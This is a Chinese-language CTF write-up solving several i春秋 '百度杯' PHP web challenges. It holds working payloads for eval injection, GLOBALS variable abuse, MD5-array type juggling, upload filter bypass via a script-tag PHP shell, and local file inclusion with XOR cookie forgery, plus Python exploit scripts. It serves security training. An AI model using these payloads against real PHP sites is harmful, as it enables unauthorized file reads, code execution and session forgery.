[i春秋]Web

“百度杯”CTF比赛 2017 二月场_爆破-1

题目内容：flag就在某六位变量中。

• 打开页面给出了源代码：

<?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
  die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>

• 看到了$$a,可能是用超全局变量GLOBALS，于是post或者get一个参数hello=GLOBALS，果然：

array(9) { ["_GET"]=> array(0) { } ["_POST"]=> array(1) { ["hello"]=> string(7) "GLOBALS" } ["_COOKIE"]=> array(12) { ["UM_distinctid"]=> string(60) "16043bd3caaeb9-0b92da86f81d64-572f7b6e-144000-16043bd3cabcbb" ["pgv_pvi"]=> string(10) "4712199168" ["Hm_lvt_2d0601bd28de7d49818249cf35d95943"]=> string(43) "1517321365,1517561003,1517806905,1518241521" ["Hm_lvt_1a32f7c660491887db0960e9c314b022"]=> string(21) "1517716104,1518241572" ["Hm_lvt_9104989ce242a8e03049eaceca950328"]=> string(21) "1517716103,1518241572" ["browse"]=> string(428) "CFlRTxUYU0BcVVhAVQJTRFBZSkdeQF5YWFFFR19RW0VTUV9PXURLTgBZXUFZQlxOGllZTFRTW0VYW0VFX1xZQUlRWU9eRlNBX0FTHFREX01ZVFMGVEBQT0tRWERWXFlERFNcVV9IU0dRWVtNTEoAT1xVUURfShpPWFpSV1xBWE1EU1lYXkVJR1lZWkVUQVtXUgpSQFhIWkxSEFJEV0tLR1lSUFheQERFXUNaRVRDWU9YU0pOB0tcQ1laW04dS1hMU0FaRV9JREVYTlhBTkNZT1tUUkBbU1IcU1ZQQldIUgZTUlFPTENZRFFOWERDQV1VW1JSRFhLW0BLWAFPW0JQRlxYG09fSFNXW1NZTUNBWFhZV0hHX0tYQ1NWXFdVGFNAX1BdQFUCU0RQWUpHXkBRWFlSRUZfUVtHU1JRT19DS04U" ["chkphone"]=> string(33) "acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O" ["ci_session"]=> string(40) "83424777bfb234df7faa495fd1d754b785933fa1" ["pgv_si"]=> string(11) "s4974850048" ["Hm_lpvt_2d0601bd28de7d49818249cf35d95943"]=> string(10) "1518241600" ["Hm_lpvt_9104989ce242a8e03049eaceca950328"]=> string(10) "1518241572" ["Hm_lpvt_1a32f7c660491887db0960e9c314b022"]=> string(10) "1518241572" } ["_FILES"]=> array(0) { } ["_REQUEST"]=> array(1) { ["hello"]=> string(7) "GLOBALS" } ["flag"]=> string(38) "flag在一个长度为6的变量里面" ["d3f0f8"]=> string(42) "flag{bbb87d3a-f564-43c4-a341-0a2ed11dbda8}" ["a"]=> string(7) "GLOBALS" ["GLOBALS"]=> *RECURSION* } <?php
include "flag.php";
$a = @$_REQUEST['hello'];
if(!preg_match('/^\w*$/',$a )){
  die('ERROR');
}
eval("var_dump($$a);");
show_source(__FILE__);
?>

• flag{bbb87d3a-f564-43c4-a341-0a2ed11dbda8}

---

“百度杯”CTF比赛 2017 二月场_爆破-2

题目内容：flag不在变量中。

• post/get参数可以传入函数或者命令
• payload：
  1.?hello=file('flag.php')
  2.?hello=file_get_contents('flag.php')(这个payload经过测试出不来flag)

array(3) { [0]=> string(6) " string(32) "$flag = 'Too Young Too Simple'; " [2]=> string(45) "#flag{4408aece-a177-4821-bf96-21d6593802f8}; " } <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);

• flag{4408aece-a177-4821-bf96-21d6593802f8}

---

“百度杯”CTF比赛 2017 二月场_爆破-3

题目内容：这个真的是爆破。

<?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){   ##时间限时两分钟
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];  ##随机选一个字母

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){  
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

• 关键代码：

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){ 
##substr(md5($value),5,4)第五个字符开始取四个字符，是否==0 
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

• 这里md5()一个array可以绕过==判断，md5()一个array返回null，null==0成立：

  
  

• 构造payload：
  1.?value[]=ea
  返回两个字符，如hv,此时$_SESSION['nums']=1
  2.?value[]=hv
  此时$_SESSION['nums']=2
  ...
  10.?value[0]=**
  此时$_SESSION['nums']=10,echo $flag

owflag{30f4d30c-6db0-4029-919f-7519d8060251} <?php 
error_reporting(0);
session_start();
require('./flag.php');
if(!isset($_SESSION['nums'])){
  $_SESSION['nums'] = 0;
  $_SESSION['time'] = time();
  $_SESSION['whoami'] = 'ea';
}

if($_SESSION['time']+120<time()){
  session_destroy();
}

$value = $_REQUEST['value'];
$str_rand = range('a', 'z');
$str_rands = $str_rand[mt_rand(0,25)].$str_rand[mt_rand(0,25)];

if($_SESSION['whoami']==($value[0].$value[1]) && substr(md5($value),5,4)==0){
  $_SESSION['nums']++;
  $_SESSION['whoami'] = $str_rands;
  echo $str_rands;
}

if($_SESSION['nums']>=10){
  echo $flag;
}

show_source(__FILE__);
?>

• 后记：用python脚本

import requests
url='http://10ff0cf83b464bc2957f8deb00ae24f12774ecc5dbcd4331.game.ichunqiu.com/'
session=requests.Session()
html=session.get(url+'?value[]=ea').text #注意：如果value[]=ea的话，value[0]=ea,value[1]为空，那么$value[0].$value[1]=$value[0]=ea
for i in range(10):
    html=session.get(url+'?value[]='+html[0:2]).text
    if 'flag{.*}' in html:
        break
print (html)

• array数组的结构与定义：

  
  

• flag{30f4d30c-6db0-4029-919f-7519d8060251}

---

“百度杯”CTF比赛 九月场_Upload

题目内容：想怎么传就怎么传，就是这么任性。
tips:flag在flag.php中

• 可以上传任意文件，并且上传之后可以打开文件，想到上传一段php代码来打开flag.php页面：

<?php
$fh=fopen('../flag.php','r');
echo fread($fh,filesize("../flag.php"));
fclose($fh);
?>

• 打开上传的文件发现<?和php被过滤了：
  $fh=fopen('../flag.','r'); echo fread($fh,filesize("../flag.")); fclose($fh); ?>
• 想着用大写绕过php：

<?php
$fh=fopen('../flag.php','r');
echo fread($fh,filesize("../flag.php"));
fclose($fh);
?>

• 结果返回：
  PHP$fh=fopen('../flag.PHP','r'); echo fread($fh,filesize("../flag.PHP")); fclose($fh); ?>
• 于是用<script language="PHP">绕过过滤的<？，用函数strtolower("PHP")过滤的php：

<script language="PHP">
$fh=fopen("../flag.".strtolower("PHP"),'r');
echo fread($fh,filesize("../flag.".strtolower("PHP"))); #点号.是连接符，开始还用+号来连接，搞错了。
fclose($fh);
</script>

• 查看源码：

echo 'here_is_flag';
'flag{36815007-b8e3-448c-9f9d-ac712756ce87}';

• flag{36815007-b8e3-448c-9f9d-ac712756ce87}

---

百度杯”CTF比赛 九月场_Code

题目内容：考脑洞，你能过么？

• 打开是一张图片：http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/index.php?jpg=hei.jpg
  
• 看url发现可能是文件包含,尝试查看index.php：http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/index.php?jpg=index.php
• 查看源码得到base64加密的code，解密得到index.php源码：

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=hei.jpg');
$file = $_GET['jpg'];
echo '<title>file:'.$file.'</title>';
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);  ##在正则表达式中，/顺斜杠是表示表达式的开始和结束的“定界符”。\反斜杠是表示转义字符。^放在[]来表示排除不满足该集合的字符.
$file = str_replace("config","_", $file);
$txt = base64_encode(file_get_contents($file));

echo "<img src='data:image/gif;base64,".$txt."'></img>";

/*
 * Can you find the flag file?
 *
 */

?>

• PhpStorm 新建项目会生成.idea文件夹：

  
  
• 在.idea/workspace.xml发现有个页面:"file://$PROJECT_DIR$/fl3g_ichuqiu.php",尝试用文件包含漏洞来读取fl3g_ichuqiu.php的源码，用fl3gconfigichuqiu.php来绕过过滤：
  http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/index.php?jpg=fl3gconfigichuqiu.php
  
• decodebase64得到源码：

<?php
/**
 * Created by PhpStorm.
 * Date: 2015/11/16
 * Time: 1:31
 */
error_reporting(E_ALL || ~E_NOTICE);
include('config.php');
#随机返回$length个字符
function random($length, $chars = '      ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz') {
    $hash = '';
    $max = strlen($chars) - 1;
    for($i = 0; $i < $length; $i++) {
        $hash .= $chars[mt_rand(0, $max)];
    }
    return $hash; 
}
#加密
function encrypt($txt,$key){
    for($i=0;$i<strlen($txt);$i++){
        $tmp .= chr(ord($txt[$i])+10);
    }
    $txt = $tmp;          #返回每个字符的ascii+10对应的字符
    $rnd=random(4);       #随机返回4个字符
    $key=md5($rnd.$key);  #随机四个字符和key拼接，返回md5值
    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $ttmp .= $txt[$i] ^ $key[++$s]; #$txt每个字符与$key的字符按位异或，"^" 按位异或运算
    }
    return base64_encode($rnd.$ttmp);    #随机4个字符拼接$ttmp，再base64
}
#解密
function decrypt($txt,$key){
    $txt=base64_decode($txt);  #base64decode
    $rnd = substr($txt,0,4);   #取$txt前四个字符
    $txt = substr($txt,4);   #取$txt第五个字符开始，剩下全部字符
    $key=md5($rnd.$key); #前四个字符和key拼接，返回md5

    $s=0;
    for($i=0;$i<strlen($txt);$i++){
        if($s == 32) $s = 0;
        $tmp .= $txt[$i]^$key[++$s];
    }
    for($i=0;$i<strlen($tmp);$i++){
        $tmp1 .= chr(ord($tmp[$i])-10);
    }
    return $tmp1;
}
$username = decrypt($_COOKIE['user'],$key);
if ($username == 'system'){
    echo $flag;
}else{
    setcookie('user',encrypt('guest',$key));
    echo "�(���)�";
}
?>

• 这是一个加密解密的函数，要求页面http://927e0dde93264ca9bf59cdf7ac271e15fac7a9ab1b9f4074.game.ichunqiu.com/fl3gconfigichuqiu.php的$_COOKIE['user']==对'system'加密后的字符，写了一个python脚本来'system'加密：

import base64
base64encode=str(base64.b64decode('WkVjbkBJWxtM'),"utf-8")
rnd=base64encode[0:4]
ttmp=base64encode[4:]
guest=list('guest')
key=list('123456')
for i in range(len(guest)):
    guest[i]=chr(ord(guest[i])+10)
for i in range(len(guest)):
    key[i]=chr(ord(guest[i])^ord(ttmp[i])) #得到了key的前五位,因为'guest'有五位字符
#加密
user=list('system')
for i in range(len(user)):
    user[i]=chr(ord(user[i])+10)
char='0123456789abcdef'#一般128位的MD5散列被表示为32位十六进制数字。所以这些字符取值范围仅限于0-9和a-f。
for i in range(len(char)):
    key[5]=char[i]
    ttmp_1=''
    for j in range(len(user)):
        ttmp_1+=chr(ord(user[j])^ord(key[j]))
    new=bytes(rnd+ttmp_1,"utf-8")
    print(str(base64.b64encode(new),"utf-8"))

• 然后用Burpsuite来爆破key的最后一位，按道理应该是这样，但是用bp就是出不来flag

  
  
  

---